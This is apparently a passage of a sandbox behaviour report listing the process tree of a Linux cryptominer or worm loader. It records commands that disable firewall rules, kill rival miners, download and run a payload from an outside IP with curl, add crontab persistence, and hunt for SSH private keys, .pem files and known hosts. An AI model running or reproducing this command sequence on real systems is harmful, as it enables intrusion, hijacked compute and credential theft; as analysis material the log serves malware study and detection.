        • ufw-init New Fork (PID: 3547, Parent: 2733)
        • ip6tables (PID: 3547, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-forward
        • ufw-init New Fork (PID: 3552, Parent: 2733)
        • ip6tables (PID: 3552, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-logging-forward
        • ufw-init New Fork (PID: 3557, Parent: 2733)
        • ip6tables (PID: 3557, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-forward
        • ufw-init New Fork (PID: 3561, Parent: 2733)
        • ip6tables (PID: 3561, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-forward
        • ufw-init New Fork (PID: 3565, Parent: 2733)
        • ip6tables (PID: 3565, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-logging-forward
        • ufw-init New Fork (PID: 3569, Parent: 2733)
        • ip6tables (PID: 3569, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-track-forward
        • ufw-init New Fork (PID: 3575, Parent: 2733)
        • ip6tables (PID: 3575, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-track-output
        • ufw-init New Fork (PID: 3580, Parent: 2733)
        • ip6tables (PID: 3580, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-track-input
        • ufw-init New Fork (PID: 3585, Parent: 2733)
        • ip6tables (PID: 3585, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 3590, Parent: 2733)
        • ip6tables (PID: 3590, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-reject-output
        • ufw-init New Fork (PID: 3597, Parent: 2733)
        • ip6tables (PID: 3597, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-logging-output
        • ufw-init New Fork (PID: 3603, Parent: 2733)
        • ip6tables (PID: 3603, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-output
        • ufw-init New Fork (PID: 3608, Parent: 2733)
        • ip6tables (PID: 3608, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-logging-output
        • ufw-init New Fork (PID: 3613, Parent: 2733)
        • ip6tables (PID: 3613, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-output
        • ufw-init New Fork (PID: 3618, Parent: 2733)
        • ip6tables (PID: 3618, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-output
        • ufw-init New Fork (PID: 3625, Parent: 2733)
        • ip6tables (PID: 3625, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-logging-output
        • ufw-init New Fork (PID: 3631, Parent: 2733)
        • ip6tables (PID: 3631, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-logging-deny
        • ufw-init New Fork (PID: 3634, Parent: 2733)
        • ip6tables (PID: 3634, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-logging-allow
        • ufw-init New Fork (PID: 3640, Parent: 2733)
        • ip6tables (PID: 3640, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-not-local
        • ufw-init New Fork (PID: 3647, Parent: 2733)
        • ip6tables (PID: 3647, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-logging-input
        • ufw-init New Fork (PID: 3654, Parent: 2733)
        • ip6tables (PID: 3654, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-logging-output
        • ufw-init New Fork (PID: 3662, Parent: 2733)
        • ip6tables (PID: 3662, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-logging-forward
        • ufw-init New Fork (PID: 3667, Parent: 2733)
        • ip6tables (PID: 3667, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-limit-accept
        • ufw-init New Fork (PID: 3675, Parent: 2733)
        • ip6tables (PID: 3675, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-limit
        • ufw-init New Fork (PID: 3681, Parent: 2733)
        • ip6tables (PID: 3681, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-input
        • ufw-init New Fork (PID: 3687, Parent: 2733)
        • ip6tables (PID: 3687, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-forward
        • ufw-init New Fork (PID: 3695, Parent: 2733)
        • ip6tables (PID: 3695, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-output
        • ufw-init New Fork (PID: 3703, Parent: 2733)
        • ip6tables (PID: 3703, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 3709, Parent: 2733)
        • ip6tables (PID: 3709, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 3712, Parent: 2733)
        • ip6tables (PID: 3712, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 3715, Parent: 2733)
        • ip6tables (PID: 3715, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -P INPUT ACCEPT
        • ufw-init New Fork (PID: 3719, Parent: 2733)
        • ip6tables (PID: 3719, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -P OUTPUT ACCEPT
        • ufw-init New Fork (PID: 3723, Parent: 2733)
        • ip6tables (PID: 3723, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -P FORWARD ACCEPT
    • sh New Fork (PID: 3733, Parent: 2676)
    • iptables (PID: 3733, Parent: 2676, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P INPUT ACCEPT
    • sh New Fork (PID: 3740, Parent: 2676)
    • iptables (PID: 3740, Parent: 2676, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P OUTPUT ACCEPT
    • sh New Fork (PID: 3744, Parent: 2676)
    • iptables (PID: 3744, Parent: 2676, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P FORWARD ACCEPT
    • sh New Fork (PID: 3748, Parent: 2676)
    • iptables (PID: 3748, Parent: 2676, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F
    • sh New Fork (PID: 3755, Parent: 2676)
    • chattr (PID: 3755, Parent: 2676, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/ld.so.preload
    • sh New Fork (PID: 3765, Parent: 2676)
    • cat (PID: 3765, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
    • sh New Fork (PID: 3770, Parent: 2676)
    • chattr (PID: 3770, Parent: 2676, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/hosts
    • sh New Fork (PID: 3777, Parent: 2676)
    • sed (PID: 3777, Parent: 2676, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /f2pool.com\\|nanopool.org\\|minexmr.com\\|supportxmr.com\\|c3pool.com/d /etc/hosts
    • sh New Fork (PID: 3789, Parent: 2676)
      • sh New Fork (PID: 3791, Parent: 3789)
        • sh New Fork (PID: 3793, Parent: 3791)
        • id (PID: 3793, Parent: 3791, MD5: 24007385139205c5b3d116e4efd3253e) Arguments: id -u
      • grep (PID: 3791, Parent: 3789, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep x:0: /etc/passwd
      • sh New Fork (PID: 3792, Parent: 3789)
      • cut (PID: 3792, Parent: 3789, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -d: -f6
    • sh New Fork (PID: 3805, Parent: 2676)
    • chmod (PID: 3805, Parent: 2676, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /tmp/i
    • sh New Fork (PID: 3812, Parent: 2676)
    • sh (PID: 3812, Parent: 2676, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh ./i
    • sh New Fork (PID: 3821, Parent: 2676)
    • rm (PID: 3821, Parent: 2676, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -f i
    • sh New Fork (PID: 3825, Parent: 2676)
    • mv (PID: 3825, Parent: 2676, MD5: unknown) Arguments: mv /usr/bin/ps.original /usr/bin/ps
    • sh New Fork (PID: 3832, Parent: 2676)
    • crontab (PID: 3832, Parent: 2676, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
    • sh New Fork (PID: 3833, Parent: 2676)
    • sed (PID: 3833, Parent: 2676, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed /\\.bashgo\\|pastebin\\|onion\\|bprofr/d
    • sh New Fork (PID: 3834, Parent: 2676)
    • crontab (PID: 3834, Parent: 2676, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -
    • sh New Fork (PID: 3841, Parent: 2676)
    • cat (PID: 3841, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /proc/mounts
    • sh New Fork (PID: 3842, Parent: 2676)
    • awk (PID: 3842, Parent: 2676, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk "{print $2}"
    • sh New Fork (PID: 3843, Parent: 2676)
    • grep (PID: 3843, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -P /proc/\\d+
    • sh New Fork (PID: 3844, Parent: 2676)
    • grep (PID: 3844, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -Po \\d+
    • sh New Fork (PID: 3845, Parent: 2676)
    • xargs (PID: 3845, Parent: 2676, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs -I % kill -9 %
    • sh New Fork (PID: 3857, Parent: 2676)
    • ps (PID: 3857, Parent: 2676, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps aux
    • sh New Fork (PID: 3858, Parent: 2676)
    • grep (PID: 3858, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
    • sh New Fork (PID: 3859, Parent: 2676)
    • grep (PID: 3859, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -E mysqldd|\\./python|javae|zgrab|init\\.sh|monero|xmrig|pnscan|zzh|\\./crun|kdevtmpfsi|kinsing|masscan|sshpass|sshexec|xms|load\\.sh|bashirc|dbused|cnrig|attack|/var/tmp/ip|scan\\.log|dovecat|solr\\.sh|solrd|donate-level|network0[0-1]|srv00[1-9]|srv01[0-2]
    • sh New Fork (PID: 3860, Parent: 2676)
    • awk (PID: 3860, Parent: 2676, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk "{print $2}"
    • sh New Fork (PID: 3861, Parent: 2676)
    • xargs (PID: 3861, Parent: 2676, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs -I % kill -9 %
    • sh New Fork (PID: 3916, Parent: 2676)
    • sh New Fork (PID: 3920, Parent: 2676)
    • id (PID: 3920, Parent: 2676, MD5: 24007385139205c5b3d116e4efd3253e) Arguments: id -u
    • sh New Fork (PID: 3926, Parent: 2676)
    • systemctl (PID: 3926, Parent: 2676, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop bot
    • sh New Fork (PID: 3938, Parent: 2676)
    • apt-get (PID: 3938, Parent: 2676, MD5: c9b39d1d45cf6ac57f725249262b82e4) Arguments: apt-get -y install curl
    • sh New Fork (PID: 3952, Parent: 2676)
    • ps (PID: 3952, Parent: 2676, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps aux
    • sh New Fork (PID: 3953, Parent: 2676)
    • grep (PID: 3953, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -i [a]liyun
    • sh New Fork (PID: 4031, Parent: 2676)
    • ps (PID: 4031, Parent: 2676, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps aux
    • sh New Fork (PID: 4032, Parent: 2676)
    • grep (PID: 4032, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -i [y]unjing
    • sh New Fork (PID: 4062, Parent: 2676)
    • rm (PID: 4062, Parent: 2676, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /tmp/28e9b_ldr.sh /tmp/config-err-kcpEqe /tmp/systemd-private-f8f6f10c5826436299e2586b5e397d9f-rtkit-daemon.service-WlCClE /tmp/. /tmp/.. /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X0-lock /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix /tmp/.xfsm-ICE-VBAQE0
    • sh New Fork (PID: 4064, Parent: 2676)
    • ps (PID: 4064, Parent: 2676, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps -fe
    • sh New Fork (PID: 4065, Parent: 2676)
    • grep (PID: 4065, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep kthreaddi
    • sh New Fork (PID: 4066, Parent: 2676)
    • grep (PID: 4066, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
    • sh New Fork (PID: 4097, Parent: 2676)
    • uname (PID: 4097, Parent: 2676, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: uname -m
    • sh New Fork (PID: 4099, Parent: 2676)
    • chattr (PID: 4099, Parent: 2676, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i 8267b26db341
    • sh New Fork (PID: 4103, Parent: 2676)
    • rm (PID: 4103, Parent: 2676, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf 8267b26db341
    • sh New Fork (PID: 4109, Parent: 2676)
    • curl (PID: 4109, Parent: 2676, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -k http://194.145.227.21/sys.x86_64
    • sh New Fork (PID: 4134, Parent: 2676)
    • chmod (PID: 4134, Parent: 2676, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x 8267b26db341
    • sh New Fork (PID: 4135, Parent: 2676)
    • nohup (PID: 4135, Parent: 2676, MD5: 3b11bb9dc8a020bb26e3cf5cf1da3cba) Arguments: nohup 8267b26db341
    • 8267b26db341 (PID: 4135, Parent: 2676, MD5: unknown) Arguments: 8267b26db341
      • kthreaddk (PID: 4499, Parent: 4135, MD5: unknown) Arguments: kthreaddk
        • kthreaddk New Fork (PID: 4501, Parent: 4499)
          • sh (PID: 4514, Parent: 4501, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/sbin/modprobe msr > /dev/null 2>&1"
            • sh New Fork (PID: 4515, Parent: 4514)
            • modprobe (PID: 4515, Parent: 4514, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe msr
      • sh (PID: 4536, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "\nchattr -R -ia /var/spool/cron\nchattr -ia /etc/crontab\nchattr -R -ia /var/spool/cron/crontabs\nchattr -R -ia /etc/cron.d"
        • sh New Fork (PID: 4537, Parent: 4536)
        • chattr (PID: 4537, Parent: 4536, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron
        • sh New Fork (PID: 4539, Parent: 4536)
        • chattr (PID: 4539, Parent: 4536, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/crontab
        • sh New Fork (PID: 4544, Parent: 4536)
        • chattr (PID: 4544, Parent: 4536, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron/crontabs
        • sh New Fork (PID: 4548, Parent: 4536)
        • chattr (PID: 4548, Parent: 4536, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /etc/cron.d
      • sh (PID: 4554, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "echo '* * * * * /dev/disk/by-path/ytdgwk' | /usr/bin/crontab -"
        • sh New Fork (PID: 4560, Parent: 4554)
        • sh New Fork (PID: 4561, Parent: 4554)
        • crontab (PID: 4561, Parent: 4554, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: /usr/bin/crontab -
      • sh (PID: 4602, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "\nchattr -R -ia /var/spool/cron\nchattr -ia /etc/crontab\nchattr -R -ia /var/spool/cron/crontabs\nchattr -R -ia /etc/cron.d"
        • sh New Fork (PID: 4603, Parent: 4602)
        • chattr (PID: 4603, Parent: 4602, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron
        • sh New Fork (PID: 4604, Parent: 4602)
        • chattr (PID: 4604, Parent: 4602, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/crontab
        • sh New Fork (PID: 4605, Parent: 4602)
        • chattr (PID: 4605, Parent: 4602, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron/crontabs
        • sh New Fork (PID: 4608, Parent: 4602)
        • chattr (PID: 4608, Parent: 4602, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /etc/cron.d
      • sh (PID: 4629, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "echo '* * * * * /etc/apparmor.d/tunables/ytdgwk' | /usr/bin/crontab -"
        • sh New Fork (PID: 4631, Parent: 4629)
        • sh New Fork (PID: 4632, Parent: 4629)
        • crontab (PID: 4632, Parent: 4629, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: /usr/bin/crontab -
      • sh (PID: 4668, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "\nchattr -R -ia /var/spool/cron\nchattr -ia /etc/crontab\nchattr -R -ia /var/spool/cron/crontabs\nchattr -R -ia /etc/cron.d"
        • sh New Fork (PID: 4669, Parent: 4668)
        • chattr (PID: 4669, Parent: 4668, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron
        • sh New Fork (PID: 4671, Parent: 4668)
        • chattr (PID: 4671, Parent: 4668, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/crontab
        • sh New Fork (PID: 4677, Parent: 4668)
        • chattr (PID: 4677, Parent: 4668, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron/crontabs
        • sh New Fork (PID: 4680, Parent: 4668)
        • chattr (PID: 4680, Parent: 4668, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /etc/cron.d
      • sh (PID: 4688, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "echo '* * * * * /etc/apport/crashdb.conf.d/ytdgwk' | /usr/bin/crontab -"
        • sh New Fork (PID: 4692, Parent: 4688)
        • sh New Fork (PID: 4693, Parent: 4688)
        • crontab (PID: 4693, Parent: 4688, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: /usr/bin/crontab -
      • sh (PID: 4734, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "\nchattr -R -ia /var/spool/cron\nchattr -ia /etc/crontab\nchattr -R -ia /var/spool/cron/crontabs\nchattr -R -ia /etc/cron.d"
        • sh New Fork (PID: 4735, Parent: 4734)
        • chattr (PID: 4735, Parent: 4734, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron
        • sh New Fork (PID: 4736, Parent: 4734)
        • chattr (PID: 4736, Parent: 4734, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/crontab
        • sh New Fork (PID: 4737, Parent: 4734)
        • chattr (PID: 4737, Parent: 4734, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron/crontabs
        • sh New Fork (PID: 4739, Parent: 4734)
        • chattr (PID: 4739, Parent: 4734, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /etc/cron.d
      • sh (PID: 4743, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "echo '* * * * * /dev/shm/ytdgwk' | /usr/bin/crontab -"
        • sh New Fork (PID: 4748, Parent: 4743)
        • sh New Fork (PID: 4749, Parent: 4743)
        • crontab (PID: 4749, Parent: 4743, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: /usr/bin/crontab -
    • sh New Fork (PID: 4136, Parent: 2676)
      • sh New Fork (PID: 4137, Parent: 4136)
      • find (PID: 4137, Parent: 4136, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /home/user/ /root /home -maxdepth 2 -name id_rsa*
      • sh New Fork (PID: 4138, Parent: 4136)
      • grep (PID: 4138, Parent: 4136, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -vw pub
    • sh New Fork (PID: 4176, Parent: 2676)
      • sh New Fork (PID: 4178, Parent: 4176)
      • cat (PID: 4178, Parent: 4176, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /home/user/.ssh/config /home/*/.ssh/config /root/.ssh/config
      • sh New Fork (PID: 4179, Parent: 4176)
      • grep (PID: 4179, Parent: 4176, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep IdentityFile
      • sh New Fork (PID: 4180, Parent: 4176)
      • awk (PID: 4180, Parent: 4176, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk -F IdentityFile "{print $2 }"
    • sh New Fork (PID: 4186, Parent: 2676)
      • sh New Fork (PID: 4190, Parent: 4186)
      • find (PID: 4190, Parent: 4186, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /home/user/ /root /home -maxdepth 3 -name *.pem
      • sh New Fork (PID: 4191, Parent: 4186)
      • uniq (PID: 4191, Parent: 4186, MD5: 7281c3baf4062776958ba17bb9086d23) Arguments: uniq
    • sh New Fork (PID: 4226, Parent: 2676)
      • sh New Fork (PID: 4227, Parent: 4226)
      • cat (PID: 4227, Parent: 4226, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /home/user/.ssh/config /home/*/.ssh/config /root/.ssh/config
      • sh New Fork (PID: 4228, Parent: 4226)
      • grep (PID: 4228, Parent: 4226, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep HostName
      • sh New Fork (PID: 4229, Parent: 4226)
      • awk (PID: 4229, Parent: 4226, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk -F HostName "{print $2}"
    • sh New Fork (PID: 4230, Parent: 2676)
      • sh New Fork (PID: 4232, Parent: 4230)
      • cat (PID: 4232, Parent: 4230, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /home/user/.bash_history /home/user/.bash_history /root/.bash_history
      • sh New Fork (PID: 4233, Parent: 4230)
      • grep (PID: 4233, Parent: 4230, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -E (ssh|scp)
      • sh New Fork (PID: 4234, Parent: 4230)
      • grep (PID: 4234, Parent: 4230, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -oP ([0-9]{1,3}\\.){3}[0-9]{1,3}
    • sh New Fork (PID: 4240, Parent: 2676)
      • sh New Fork (PID: 4245, Parent: 4240)
      • cat (PID: 4245, Parent: 4240, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /home/user/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts
      • sh New Fork (PID: 4246, Parent: 4240)
      • grep (PID: 4246, Parent: 4240, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -oP ([0-9]{1,3}\\.){3}[0-9]{1,3}
      • sh New Fork (PID: 4247, Parent: 4240)
      • uniq (PID: 4247, Parent: 4240, MD5: 7281c3baf4062776958ba17bb9086d23) Arguments: uniq
    • sh New Fork (PID: 4258, Parent: 2676)
      • sh New Fork (PID: 4262, Parent: 4258)
      • find (PID: 4262, Parent: 4258, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /home/user/ /root /home -maxdepth 2 -name \\.ssh
      • sh New Fork (PID: 4263, Parent: 4258)
      • uniq (PID: 4263, Parent: 4258, MD5: 7281c3baf4062776958ba17bb9086d23) Arguments: uniq
      • sh New Fork (PID: 4264, Parent: 4258)
      • xargs (PID: 4264, Parent: 4258, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs find
        • xargs New Fork (PID: 4271, Parent: 4264)
        • find (PID: 4271, Parent: 4264, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find
      • sh New Fork (PID: 4265, Parent: 4258)
      • awk (PID: 4265, Parent: 4258, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk /id_rsa/
      • sh New Fork (PID: 4266, Parent: 4258)
      • awk (PID: 4266, Parent: 4258, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk -F/ "{print $3}"
      • sh New Fork (PID: 4267, Parent: 4258)
      • uniq (PID: 4267, Parent: 4258, MD5: 7281c3baf4062776958ba17bb9086d23) Arguments: uniq
      • sh New Fork (PID: 4268, Parent: 4258)
      • grep (PID: 4268, Parent: 4258, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v \\.ssh
    • sh New Fork (PID: 4283, Parent: 2676)
      • sh New Fork (PID: 4286, Parent: 4283)
      • sh New Fork (PID: 4287, Parent: 4283)
      • tr (PID: 4287, Parent: 4283, MD5: c3b8966209cabdf2aea6b52dba40f87d) Arguments: tr " " \\n
      • sh New Fork (PID: 4288, Parent: 4283)
      • nl (PID: 4288, Parent: 4283, MD5: d9f1aeacda6ab67392e095da38197886) Arguments: nl
      • sh New Fork (PID: 4289, Parent: 4283)
      • sort (PID: 4289, Parent: 4283, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u -k2
      • sh New Fork (PID: 4290, Parent: 4283)
      • sort (PID: 4290, Parent: 4283, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -n
      • sh New Fork (PID: 4291, Parent: 4283)
      • cut (PID: 4291, Parent: 4283, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -f2-
    • sh New Fork (PID: 4299, Parent: 2676)
      • sh New Fork (PID: 4304, Parent: 4299)
      • sh New Fork (PID: 4305, Parent: 4299)
      • grep (PID: 4305, Parent: 4299, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -vw 127.0.0.1
      • sh New Fork (PID: 4306, Parent: 4299)
      • tr (PID: 4306, Parent: 4299, MD5: c3b8966209cabdf2aea6b52dba40f87d) Arguments: tr " " \\n
      • sh New Fork (PID: 4307, Parent: 4299)
      • nl (PID: 4307, Parent: 4299, MD5: d9f1aeacda6ab67392e095da38197886) Arguments: nl
      • sh New Fork (PID: 4308, Parent: 4299)
      • sort (PID: 4308, Parent: 4299, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u -k2
      • sh New Fork (PID: 4309, Parent: 4299)
      • sort (PID: 4309, Parent: 4299, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -n
      • sh New Fork (PID: 4310, Parent: 4299)
      • cut (PID: 4310, Parent: 4299, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -f2-
    • sh New Fork (PID: 4319, Parent: 2676)
      • sh New Fork (PID: 4325, Parent: 4319)
      • sh New Fork (PID: 4326, Parent: 4319)
      • tr (PID: 4326, Parent: 4319, MD5: c3b8966209cabdf2aea6b52dba40f87d) Arguments: tr " " \\n
      • sh New Fork (PID: 4327, Parent: 4319)
      • nl (PID: 4327, Parent: 4319, MD5: d9f1aeacda6ab67392e095da38197886) Arguments: nl
      • sh New Fork (PID: 4328, Parent: 4319)
      • sort (PID: 4328, Parent: 4319, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u -k2
      • sh New Fork (PID: 4329, Parent: 4319)
      • sort (PID: 4329, Parent: 4319, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -n
      • sh New Fork (PID: 4330, Parent: 4319)
      • cut (PID: 4330, Parent: 4319, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -f2-
    • sh New Fork (PID: 4336, Parent: 2676)
    • cat (PID: 4336, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
    • sh New Fork (PID: 4344, Parent: 2676)
    • cat (PID: 4344, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
    • sh New Fork (PID: 4351, Parent: 2676)
    • cat (PID: 4351, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
